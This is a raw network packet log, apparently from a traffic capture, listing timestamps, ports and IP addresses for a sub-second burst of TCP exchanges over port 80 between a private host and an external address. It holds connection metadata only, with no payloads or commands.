Dec 10, 2024 00:42:07.605314970 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.605360031 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.606281042 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.606329918 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.606385946 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.606435061 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.607357979 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.607408047 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.607441902 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.607485056 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.608366013 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.608418941 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.608447075 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.608491898 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.609397888 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.609445095 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.609613895 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.609659910 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.610559940 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.610606909 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.610636950 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.610678911 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.660619974 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.660723925 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.660798073 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.661139011 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.661194086 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.661212921 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.661259890 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.662214041 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.662264109 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.662312031 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.662355900 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.663209915 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.663387060 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.663440943 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.664279938 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.664325953 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.664352894 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.664391041 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.665299892 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.665350914 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.665381908 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.665429115 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.666366100 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.666413069 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.666445017 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.666491032 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.667361021 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.667448997 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.667500019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.668481112 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.668529034 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.668559074 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.668605089 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.669409037 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.669451952 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.669523001 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.669569969 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.722057104 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.722129107 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.722131014 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.722174883 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.722691059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.722742081 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.722784042 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.722830057 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.723613977 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.723660946 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.723984957 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.724030972 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.724057913 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.724106073 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.724996090 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.725045919 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.725084066 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.725132942 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.725995064 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.726046085 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.726083994 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.726133108 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.727072954 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.727085114 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.727124929 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.728045940 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.728096008 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.728178024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.728226900 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.729110003 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.729157925 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.729188919 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.729234934 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.730170012 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.730220079 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.730235100 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.730274916 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.731158018 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.731223106 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.731250048 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.731337070 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.732229948 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.732276917 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.732382059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.732431889 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.733223915 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.733270884 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.733326912 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.733374119 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.734268904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.734286070 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.734316111 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.734344006 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.735291958 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.735340118 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.735354900 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.735400915 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.736358881 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.736407995 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.736524105 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.736572981 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.737354994 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.737406015 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.737436056 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.737483978 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.738373041 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.738425016 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.738488913 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.738539934 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.739422083 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.739440918 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.739465952 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.739494085 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.740442991 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.740490913 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.740583897 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.740636110 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.741476059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.741552114 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.741570950 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.741635084 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.742497921 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.742548943 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.742638111 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.742688894 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.743509054 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.743560076 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.743608952 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.743654966 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.744564056 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.744612932 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.744668007 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.744716883 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.783340931 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.783360958 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.783417940 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.783643007 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.783698082 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.783730030 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.783781052 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.784713030 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.784763098 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.784838915 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.784889936 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.785737991 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.785784006 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.785861015 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.785911083 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.786765099 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.786813974 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.786847115 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.786895990 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.787885904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.787935019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.787961006 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.788007021 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.788793087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.788844109 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.788923979 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.788978100 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.789823055 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.789869070 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.789948940 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.789998055 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.790874958 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.790924072 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.791001081 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.791053057 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.791891098 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.791944981 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.791990042 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.792038918 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.792932987 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.792980909 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.793021917 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.793072939 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.793936014 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.793986082 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.794048071 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.794101000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.795006990 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.795053959 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.795084000 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.795130968 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.796030998 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.796080112 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.796106100 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.796156883 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.797313929 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.797363043 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.797394991 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.797442913 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.798129082 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.798181057 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.798207998 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.798254013 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.799127102 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.799175978 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.799242020 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.799288988 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.800158024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.800204039 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.800275087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.800323009 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.801170111 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.801215887 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.801276922 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.801326990 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.802198887 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.802246094 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.802304983 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.802351952 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.803204060 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.803247929 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.852891922 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.852948904 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.852981091 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.853028059 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.853334904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.853382111 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.853408098 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.853446007 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.854409933 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.854456902 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.854506969 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.854552984 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.855467081 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.855529070 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.855540991 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.855613947 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.856544971 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.856563091 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.856612921 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.857522964 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.857567072 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.857584953 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.857626915 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.858521938 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.858566046 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.858568907 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.858613014 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.859545946 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.859594107 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.859625101 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.859673023 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.860584021 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.860630989 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.860655069 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.860707998 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.861598969 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.861648083 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.861679077 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.861723900 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.914311886 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.914397955 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.914515018 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.914800882 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.914853096 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.914910078 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.914952993 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.915853024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.915910006 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.915960073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.916898012 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.916954041 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.916985035 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.917033911 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.917937040 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.918061972 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.918106079 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.918137074 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.918958902 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.919028044 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.919061899 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.919110060 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.920000076 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.920051098 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.920116901 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.920169115 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.921021938 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.921073914 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.921103954 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.921160936 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.922022104 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.922070026 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.922142982 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.922194004 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.923053980 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.923099995 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.923216105 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.923264980 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.924079895 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.924133062 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.924192905 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.924241066 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.925128937 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.925177097 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.925225973 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.925283909 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.926177979 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.926229000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.926254034 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.926301956 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.927196980 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.927248001 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.927305937 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.927355051 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.928214073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.928257942 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.928330898 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.928380013 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.929231882 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.929301977 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.929321051 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.929367065 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.930270910 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.930320024 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.930381060 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.930433035 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.931348085 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.931399107 CET	49730	80	192.168.2.4	185.215.113.206
